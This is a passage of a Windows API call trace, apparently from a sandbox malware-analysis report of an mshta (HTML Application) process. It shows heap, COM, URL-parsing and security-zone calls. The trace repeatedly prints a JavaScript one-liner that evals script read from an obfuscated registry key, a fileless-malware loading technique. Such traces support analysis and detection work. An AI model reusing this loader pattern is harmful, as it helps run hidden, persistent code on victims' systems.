pcbData=0x18f558*=0xa | out: pdwType=0x0, pvData=0x18f560, pcbData=0x18f558*=0xa) returned 0x2 [0066.425] RegCloseKey (hKey=0xa8) returned 0x0 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x80) returned 0x64f600 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f350 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x3a) returned 0x6240e0 [0066.427] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6a) returned 0x64fa88 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x624798 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, 
Size=0x26) returned 0x62d0f0 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6e) returned 0x64fb00 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e5c0 | out: hHeap=0x610000) returned 1 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e618 | out: hHeap=0x610000) returned 1 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b950 | out: hHeap=0x610000) returned 1 [0066.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6335e8 [0066.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6247c8 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633608 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x624128 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x64fb78 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x62d120 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644bc8 [0066.485] GetAcceptLanguagesW () returned 0x0 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6249a8 [0066.485] GetClassNameW (in: hWnd=0x40162, lpClassName=0x18f82c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.485] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.485] GetParent (hWnd=0x40162) returned 0x50116 [0066.485] GetClassNameW (in: hWnd=0x50116, lpClassName=0x18f82c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.486] GetParent (hWnd=0x50116) returned 0x0 [0066.486] RtlAllocateHeap 
(HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633628 [0066.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d150 [0066.486] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x633628 | out: hHeap=0x610000) returned 1 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x64fbe0 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f6e8 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x94) returned 0x64fc38 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633628 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x633648 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633668 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f700 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f718 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f730 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f748 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644bf0 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x644c18 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x644c40 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x633688 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336a8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336c8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336e8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f760 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x64f790 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, 
Flags=0x8, Size=0x10) returned 0x64f7a8 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x633708 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f7c0 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa) returned 0x64f7d8 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x26) returned 0x62d180 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644c68 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644c90 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644cb8 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624768 | out: hHeap=0x610000) returned 1 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f760 | out: hHeap=0x610000) returned 1 [0066.531] IMoniker:GetDisplayName (in: This=0x620638, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x18f7f0 | out: ppszDisplayName=0x18f7f0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.531] IUnknown:QueryInterface (in: This=0x620638, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x18f7c8 | out: ppvObject=0x18f7c8*=0x620644) returned 0x0 [0066.531] IUriContainer:GetIUri (in: This=0x620644, ppIUri=0x18f7f8 | out: ppIUri=0x18f7f8*=0x63c68c) returned 0x0 [0066.531] IUnknown:Release (This=0x620644) returned 0x1 [0066.531] IUnknown:AddRef (This=0x620638) returned 0x2 [0066.531] IUnknown:AddRef (This=0x63c68c) returned 0x5 [0066.531] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x610000) returned 1 [0066.531] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.531] IMoniker:GetDisplayName (in: This=0x620638, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x18f6d0 | out: ppszDisplayName=0x18f6d0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.531] UrlGetLocationW (psz1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.532] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppmk=0x18f69c*=0x0, dwFlags=0x1 | out: ppmk=0x18f69c*=0x64e618) returned 0x0 [0066.532] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f1e0 | out: ppv=0x18f1e0*=0x75028d20) returned 0x0 [0066.532] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f2cc | out: ppvObject=0x18f2cc*=0x75028d2c) returned 0x0 [0066.532] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.532] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x64fcd8, cchResult=0x824, pcchResult=0x18f5e0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18f5e0*=0x0) returned 0x800c0011 [0066.532] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.533] CreateUri (in: pwzURI="javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x18f694 | out: ppURI=0x18f694*=0x63be1c) returned 0x0 [0066.533] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18f62c | out: pdwScheme=0x18f62c*=0xf) returned 0x0 [0066.533] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.533] IUnknown:QueryInterface (in: This=0x63be1c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f634 | out: ppvObject=0x18f634*=0x63be1c) returned 0x0 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] IUnknown:AddRef (This=0x63be1c) returned 0x3 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.534] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x644cb8 [0066.534] IUnknown:AddRef (This=0x63be1c) returned 0x3 [0066.534] IUri:GetAbsoluteUri (in: This=0x63be1c, pbstrAbsoluteUri=0x644cb8 | out: pbstrAbsoluteUri=0x644cb8*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] IUnknown:AddRef (This=0x64e618) returned 0x2 [0066.534] IUnknown:Release (This=0x64e618) returned 0x1 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x3 [0066.534] IUnknown:Release (This=0x64e618) returned 0x0 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x4 [0066.534] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.534] IUnknown:Release (This=0x63c68c) returned 0x5 [0066.534] IUnknown:AddRef 
(This=0x63c68c) returned 0x6 [0066.534] IUnknown:QueryInterface (in: This=0x620638, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x18f470 | out: ppvObject=0x18f470*=0x620644) returned 0x0 [0066.534] IUriContainer:GetIUri (in: This=0x620644, ppIUri=0x18f4c4 | out: ppIUri=0x18f4c4*=0x63c68c) returned 0x0 [0066.534] IUnknown:Release (This=0x620644) returned 0x4 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x5 [0066.534] IUnknown:Release (This=0x620638) returned 0x4 [0066.534] IUnknown:AddRef (This=0x63c68c) returned 0x8 [0066.535] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x8 [0066.535] IUnknown:AddRef (This=0x63c68c) returned 0x9 [0066.535] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f494 | out: pdwScheme=0x18f494*=0xf) returned 0x0 [0066.535] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc8) returned 0x64fcd8 [0066.535] GetCurrentProcessId () returned 0x5bc [0066.535] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.535] IUnknown:AddRef (This=0x63c68c) returned 0xa [0066.535] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f46c | out: pdwScheme=0x18f46c*=0xf) returned 0x0 [0066.535] IUri:GetAbsoluteUri (in: This=0x63c68c, pbstrAbsoluteUri=0x18f49c | out: pbstrAbsoluteUri=0x18f49c*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") 
returned 0x0 [0066.535] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.535] SysStringLen (param_1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x64 [0066.535] CreateUri (in: pwzURI="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18f4b8 | out: ppURI=0x18f4b8*=0x63be1c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.536] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18f44c | out: pdwScheme=0x18f44c*=0xf) returned 0x0 [0066.536] IUnknown:QueryInterface (in: This=0x63be1c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f454 | out: ppvObject=0x18f454*=0x63be1c) returned 0x0 [0066.536] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.536] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0066.536] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.536] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0066.536] IUri:GetPropertyDWORD (in: This=0x63be1c, uriProp=0x11, pdwProperty=0x18f22c, dwFlags=0x0 | out: pdwProperty=0x18f22c*=0xf) returned 0x0 [0066.536] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f290, pcbSecurityId=0x18f28c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f290*=0x6a, pcbSecurityId=0x18f28c*=0x68) returned 0x0 [0066.536] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f290, pcbSecurityId=0x18f28c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f290*=0x0, pcbSecurityId=0x18f28c*=0x200) returned 0x800c0011 [0066.536] 
DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eb68 | out: ppv=0x18eb68*=0x75028d20) returned 0x0 [0066.536] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ec54 | out: ppvObject=0x18ec54*=0x75028d2c) returned 0x0 [0066.537] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.537] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=3, dwParseFlags=0x0, pwzResult=0x63cef0, cchResult=0x65, pcchResult=0x18ec9c, dwReserved=0x0 | out: pwzResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18ec9c*=0x65) returned 0x0 [0066.537] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63cfc8 [0066.537] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63cfc8 | out: hHeap=0x610000) returned 1 [0066.537] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.537] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eb68 | out: ppv=0x18eb68*=0x75028d20) returned 0x0 [0066.537] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), 
ppvObject=0x18ec54 | out: ppvObject=0x18ec54*=0x75028d2c) returned 0x0 [0066.537] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.537] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=17, dwParseFlags=0x0, pwzResult=0x63cef0, cchResult=0x65, pcchResult=0x18ecac, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18ecac*=0x0) returned 0x800c0011 [0066.537] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.538] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.538] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: hHeap=0x610000) returned 1 [0066.538] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fda8 [0066.538] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f308 | out: hHeap=0x610000) returned 1 [0066.538] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fe18 [0066.629] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f494 | out: pdwScheme=0x18f494*=0xf) returned 0x0 [0066.630] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.631] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x305084a [0066.631] GetDIBits (in: hdc=0x1b0101ce, hbm=0x305084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x18f018, usage=0x0 | out: lpvBits=0x0, lpbmi=0x18f018) returned 1 [0066.631] GetDIBits (in: hdc=0x1b0101ce, hbm=0x305084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x18f018, usage=0x0 | out: lpvBits=0x0, lpbmi=0x18f018) returned 1 [0066.631] DeleteObject (ho=0x305084a) returned 1 [0066.631] GetSysColor (nIndex=0) returned 0xc8c8c8 [0066.631] GetSysColor (nIndex=1) returned 0x0 [0066.631] GetSysColor (nIndex=2) returned 0xd1b499 [0066.631] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.631] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.631] GetSysColor (nIndex=5) returned 0xffffff [0066.631] GetSysColor (nIndex=6) returned 0x646464 [0066.631] GetSysColor (nIndex=7) 
returned 0x0 [0066.631] GetSysColor (nIndex=8) returned 0x0 [0066.631] GetSysColor (nIndex=9) returned 0x0 [0066.631] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.631] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.631] GetSysColor (nIndex=12) returned 0xababab [0066.631] GetSysColor (nIndex=13) returned 0xff9933 [0066.631] GetSysColor (nIndex=14) returned 0xffffff [0066.631] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.631] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.631] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.631] GetSysColor (nIndex=18) returned 0x0 [0066.632] GetSysColor (nIndex=19) returned 0x544e43 [0066.632] GetSysColor (nIndex=20) returned 0xffffff [0066.632] GetSysColor (nIndex=21) returned 0x696969 [0066.632] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.632] GetSysColor (nIndex=23) returned 0x0 [0066.632] GetSysColor (nIndex=24) returned 0xe1ffff [0066.632] GetSysColor (nIndex=25) returned 0x0 [0066.632] GetSysColor (nIndex=26) returned 0xcc6600 [0066.632] GetSysColor (nIndex=27) returned 0xead1b9 [0066.632] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.632] GetSysColor (nIndex=29) returned 0xff9933 [0066.632] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.632] GetSysColor (nIndex=31) returned 0x0 [0066.632] GetSysColor (nIndex=32) returned 0x0 [0066.632] GetSysColor (nIndex=33) returned 0x0 [0066.632] GetSysColor (nIndex=34) returned 0x0 [0066.632] GetSysColor (nIndex=35) returned 0x0 [0066.632] GetSysColor (nIndex=36) returned 0x0 [0066.632] GetSysColor (nIndex=37) returned 0x0 [0066.632] GetSysColor (nIndex=38) returned 0x0 [0066.632] GetSysColor (nIndex=39) returned 0x0 [0066.632] GetSysColor (nIndex=40) returned 0x0 [0066.632] GetSysColor (nIndex=41) returned 0x0 [0066.632] GetSysColor (nIndex=42) returned 0x0 [0066.632] GetSysColor (nIndex=43) returned 0x0 [0066.632] GetSysColor (nIndex=44) returned 0x0 [0066.632] GetSysColor (nIndex=45) returned 0x0 [0066.632] GetSysColor (nIndex=46) returned 0x0 [0066.632] GetSysColor 
(nIndex=47) returned 0x0 [0066.632] GetSysColor (nIndex=48) returned 0x0 [0066.632] GetSysColor (nIndex=49) returned 0x0 [0066.632] GetSysColor (nIndex=50) returned 0x0 [0066.632] GetSysColor (nIndex=51) returned 0x0 [0066.633] GetSysColor (nIndex=52) returned 0x0 [0066.633] GetSysColor (nIndex=53) returned 0x0 [0066.633] GetSysColor (nIndex=54) returned 0x0 [0066.633] GetSysColor (nIndex=55) returned 0x0 [0066.633] GetSysColor (nIndex=56) returned 0x0 [0066.633] GetSysColor (nIndex=57) returned 0x0 [0066.633] GetSysColor (nIndex=58) returned 0x0 [0066.633] GetSysColor (nIndex=59) returned 0x0 [0066.633] GetSysColor (nIndex=60) returned 0x0 [0066.633] GetSysColor (nIndex=61) returned 0x0 [0066.633] GetSysColor (nIndex=62) returned 0x0 [0066.633] GetSysColor (nIndex=63) returned 0x0 [0066.633] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.633] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.633] GetCurrentThreadId () returned 0x2a8 [0066.633] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f308 [0066.634] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x50) returned 0x650f68 [0066.634] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d788 [0066.635] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d1b0 [0066.635] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.635] GetCurrentThreadId () returned 0x2a8 [0066.635] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d788 | out: hHeap=0x610000) returned 1 [0066.635] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63cef0 [0066.635] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f438 | out: ppu=0x18f438) returned 0x0 [0066.635] CreateUri (in: pwzURI="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b84, 
dwReserved=0x0, ppURI=0x18f41c | out: ppURI=0x18f41c*=0x63be1c) returned 0x0 [0066.636] IUnknown:AddRef (This=0x63be1c) returned 0x6 [0066.636] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f3bc, dwFlags=0x0 | out: pdwZone=0x18f3bc*=0xffffffff) returned 0x800c0011 [0066.636] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec90 | out: ppv=0x18ec90*=0x75028d20) returned 0x0 [0066.636] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ed7c | out: ppvObject=0x18ed7c*=0x75028d2c) returned 0x0 [0066.637] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.637] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=3, dwParseFlags=0x0, pwzResult=0x63cfc8, cchResult=0x65, pcchResult=0x18edc4, dwReserved=0x0 | out: pwzResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18edc4*=0x65) returned 0x0 [0066.637] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63d0a0 [0066.637] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d0a0 | out: hHeap=0x610000) returned 1 [0066.637] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.637] DllGetClassObject (in: 